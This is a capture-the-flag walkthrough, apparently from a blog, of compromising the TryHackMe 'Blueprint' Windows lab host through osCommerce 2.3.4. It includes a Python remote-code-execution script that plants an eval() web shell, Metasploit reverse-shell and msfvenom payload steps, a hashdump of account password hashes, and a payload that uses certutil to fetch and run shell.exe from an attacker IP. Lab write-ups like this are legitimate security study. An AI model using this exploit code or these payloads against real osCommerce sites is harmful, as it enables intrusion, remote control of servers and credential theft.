Disclaimers
The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.
Service detection
┌──(root💀kali)-[~/tryhackme/Blueprint] └─# nmap -sV -Pn 10.10.3.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-16 03:34 EST Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 69.23% done; ETC: 03:37 (0:00:29 remaining) Nmap scan report for 10.10.3.110 Host is up (0.47s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 172.68 seconds
Service analysis
You can see that three http services, one shared service and several rpc services are opened
The browser opens port 80 and port 443 services in turn, and an error is reported on the home page.
The 8080 service shows a web app called oscommerce, version 2.3.4
Search kali for vulnerabilities in this web app:
┌──(root💀kali)-[~/tryhackme/Blueprint] └─# searchsploit oscommerce 2.3.4 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- osCommerce 2.3.4 - Multiple Vulnerabilities | php/webapps/34582.txt osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt osCommerce 2.3.4.1 - 'products_id' SQL Injection | php/webapps/46329.txt osCommerce 2.3.4.1 - 'reviews_id' SQL Injection | php/webapps/46330.txt osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting | php/webapps/49103.txt osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
It can be said that it is full of vulnerabilities, including sql injection, file upload, remote code execution, etc.
attack
We copy the remote code execution attack script locally. After testing, the target system php disables the system function, but the passthru function can be used.
We enter whoami
Echo as: nt authority\system
nice, direct maximum permission.
I've been stuck here for a long time because I can't bounce shell directly to my kali with powershell.
Later, I had to change my thinking. Since I can't rebound, I can write a sentence directly. Fortunately, the eval function can also be used. The attack code is modified as follows:
import requests
base_url = "http://10.10.3.110:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.3.110:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"
data = {
'DIR_FS_DOCUMENT_ROOT': './'
}
payload = '\');'
payload += """eval(@$_POST['cmd']);"""
payload += '/*'
data['DB_DATABASE'] = payload
r = requests.post(url=target_url, data=data)
if r.status_code == 200:
print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
print("[-] Exploit did not execute as planned")After executing the above attack script. Go to msf to find the Chinese kitchen knife module and fill in the parameters:
msf6 exploit(multi/http/caidao_php_backdoor_exec) > options Module options (exploit/multi/http/caidao_php_backdoor_exec): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD cmd yes The password of backdoor Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.3.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /oscommerce-2.3.4/catalog/install/includes/configure.php yes The path of backdoor VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic
Attack, get the initial shell and view the highest system permissions:
msf6 exploit(multi/http/caidao_php_backdoor_exec) > run [*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending exploit... [*] Sending stage (39282 bytes) to 10.10.3.110 [*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.3.110:49346) at 2021-11-17 04:10:33 -0500 meterpreter > getuid Server username: SYSTEM (0)
The problem is that the kitchen knife module does not have the hashdump command, so we have to compile another fully functional payload
┌──(root💀kali)-[~/tryhackme/Blueprint] └─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4242 -f exe > reverse.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of exe file: 73802 bytes
After uploading to the target, execute:
meterpreter > upload /root/tryhackme/Blueprint/reverse.exe [*] uploading : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe [*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /root/tryhackme/Blueprint/reverse.exe -> reverse.exe [*] uploaded : /root/tryhackme/Blueprint/reverse.exe -> reverse.exe meterpreter > execute -f reverse.exe Process 4668 created.
Get a fully functional shell in another msf:
Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.13.21.169 yes The listen address (an interface may be specified) LPORT 4242 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.13.21.169:4242 [*] Sending stage (175174 bytes) to 10.10.3.110 [*] Meterpreter session 1 opened (10.13.21.169:4242 -> 10.10.3.110:49350) at 2021-11-17 04:39:12 -0500 meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
Get the section 30e87bf999828446a1c1209ddde4c450 of the lab hash password above This website Crack the plaintext password.
Get root.txt
meterpreter > pwd C:\Users\Administrator\Desktop meterpreter > ls Listing: C:\Users\Administrator\Desktop ======================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2019-04-11 18:36:47 -0400 desktop.ini 100666/rw-rw-rw- 37 fil 2019-11-27 13:15:37 -0500 root.txt.txt
also
According to the boss's article, the payload below the attack stage can upload files from the attack aircraft to the target aircraft. Record it here:
payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil.exe -urlcache -split -f http://10.8.1.72/shell.exe shell.exe & shell.exe & nslookup test 10.8.1.72 ");'
payload += 'echo $var;'
payload += '/*'